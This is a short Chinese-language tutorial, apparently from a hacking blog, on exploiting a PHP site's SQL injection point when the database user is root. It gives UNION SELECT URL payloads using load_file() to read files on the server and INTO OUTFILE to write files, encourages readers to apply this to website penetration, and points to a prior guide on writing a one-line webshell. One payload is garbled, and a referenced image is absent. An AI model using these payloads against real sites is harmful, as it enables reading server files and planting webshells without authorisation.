当我们在获得一个php网站存在注入点以后往往会使用user()来查询当前用户的权限
如果查询结果是root权限的话且已知网站的物理路径的情况下可以直接读取网站目录下的某个文件
读取语句:load_file()
如上图所示:
mysql.exe -uroot -proot -h127.0.0.1是连接数据库 -u用户名 -p密码 -h数据库地址
select load_file(‘c://1.txt’); select是查询语句 load_file() 读取语句
完整的意思就是读取c盘根目录下的1.txt文件
在网页上执行读取的语句则是:
http://www.xxx.com/x.php?id=1 union select 1,load_file('c://1.txt'),3,4
导出语句:into outfile
select 'exehack.net' into outfile 'c:/3.txt';
完整意思就是将exehack.net 写入到C盘的根目录下命名为3.txt并导入出来
在网页上执行读取的语句则是:
http://www.xxx.com/x.php?id=1 union select 1,exehack,net,3,4 into outfile 'c:/3.txt'
以上只是一种思路如何实际的运用到网站渗透当中去大家发挥自己的想法
前面小残也发布过类似的教程网站后台执行SQL语句导出一句话拿webshell 大家可以去参考下!